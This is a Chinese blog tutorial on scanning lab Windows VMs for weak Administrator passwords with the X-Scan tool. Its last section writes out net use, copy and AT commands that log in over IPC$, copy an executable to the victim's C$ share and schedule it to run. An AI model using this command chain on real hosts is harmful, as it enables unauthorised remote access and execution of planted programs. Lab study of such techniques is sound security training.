x-scanf基本使用教程

x-scanf基本使用教程

2020-04-07 by 梦兮Q

一、实验准备

0.实验原理

  • x-scanf已经是很久维护了,最后更新时在2005年,在软件考试界面中作者写的很明白:“理论上可运行于Windows NT系列操作系统,推荐运行于Windows 2000以上的Server版Windows系统。'',但是,我多次实验证明,在win 7系统上扫描时,体验极差,各种扫描不出来和软件崩溃。
  • 多次实验后,我个人觉得在win server 2003 体验是最佳的。
  • 还有,我在实验中发现,x-scanf只能扫描出管理员账户的弱密码(Administrator)。
  • 能扫描出弱密码的原因是,一般的windows系统倒是NT server系统(Windows NT Server),为了通过网络方便远程管理和共享等。而,能有最高权限操作的只有Administrator账户,其他账户的弱密码扫描不到。(可能也是因为没有加入共享组的原因吧,我没具体实验过。)
  • 软件下载传送门
链接: https://pan.baidu.com/s/1IwT3...
提取码:9yhz
复制这段内容后打开百度网盘手机App,操作更方便哦

1.实验拓步

本实验中使用的VMware15虚拟机。

  • 一台windows server 2003当做扫描的服务器,用于运行x-scanf扫描工具。
  • 一台win7和一台win xp 模拟被扫描的主机,开启管理员账户,并设置一个建议的密码:123456,模拟注意设置了不安全的弱密码。
  • 将所有虚拟机绑定在同一块虚拟网卡(VMNet10)上,模拟所有主机处于同一局域网。

x-scanf基本使用教程_第1张图片

2.如何将所有虚拟机绑定到同一区域网中?

(1)打开虚拟网络编辑器

x-scanf基本使用教程_第2张图片

(2)创建一个虚拟网络

  • VMnet +数字标识,标识了一个虚拟机局域网。
  • 选择之后,默认类型是仅主机模式就行了,该模式中你的本地电脑和虚拟机都在同一私有区域网络。

x-scanf基本使用教程_第3张图片

(3)将虚拟机绑定到同一虚拟网络中,这里我给所有虚拟机绑定的是VMnet10。

x-scanf基本使用教程_第4张图片

3.如何开启windows系统管理员账户?

小技巧:

  • window server开机后 ,按Ctrl+Alt+Insert 进入系统就不会锁屏了。

(1)右键我的电脑,选择管理。打开计算机管理。

x-scanf基本使用教程_第5张图片

(2)启用管理员账户

x-scanf基本使用教程_第6张图片

(3)打开控制面板,按照下面的路径,找到Administrator账户,并更改密码。

这里我更改的密码为:123456
x-scanf基本使用教程_第7张图片

二、开始扫描系统漏洞

1. 配置扫描参数

打开x-scanf v3.3. GUI.

(1)检测范围

x-scanf基本使用教程_第8张图片

(1)扫描模块

模块功能很丰富,但是本次实验我们主要扫描NT-Server弱口令。

x-scanf基本使用教程_第9张图片

(3)其他设置(重要)

再虚拟环境中,可能会因为某些原因,扫描进程会跳过,所以要选择 无条件扫描
x-scanf基本使用教程_第10张图片

2.开始扫描

x-scanf基本使用教程_第11张图片

  • 扫描完成后,会自动弹出html版的扫描报告。

x-scanf基本使用教程_第12张图片

3.提取信息

(1)通过实时扫描结果

x-scanf基本使用教程_第13张图片

(2)通过扫描报告获取详细和统计信息。

查看 》 检查报告

x-scanf基本使用教程_第14张图片

x-scanf基本使用教程_第15张图片

可以点击切换报告的查看类型 HTML、TXT、XML

HTML:就是网页版本

TXT:记事本文档

XML:可扩展标记语言,将白了,一般是web配置文件的类型。

三、使用扫描到弱密码,操控主机

这里使用net 命令行的方式连接
  1. 连接对方

    必需以管理员身份打开,进入CMD/Powershell.

    注意空格

    192.168.100.131:对方IP地址

    123456:为密码

    administrator:用户名

    net use \\\\192.168.100.131\\ipc$ "123456" /user:"administrator"
  2. 映射对方的磁盘到我的电脑

    net use Y: \\\\192.168.100.131\\C$  
    //这里时将对方的C盘,映射成我的电脑下的Y盘
  3. 向对方复制文件。

    如果可以的话,建议使用资源管理器,把文件复制到Y盘就行了
    copy C:\\Server.exe  \\\\192.168.100.131\\C$  
    //复制我C盘下的‘Server.exe’文件到对方电脑的C盘根目录下
  4. 让对方电脑自动执行软件。

    就是给对方电脑发送一些工作指令
    AT \\\\192.168.100.131 22:29 c:\\Server.exe  
    //对方电脑在在22:29运行程序C盘根目录下的Server.exe程序。

你可能感兴趣的:(服务器,windows,安全)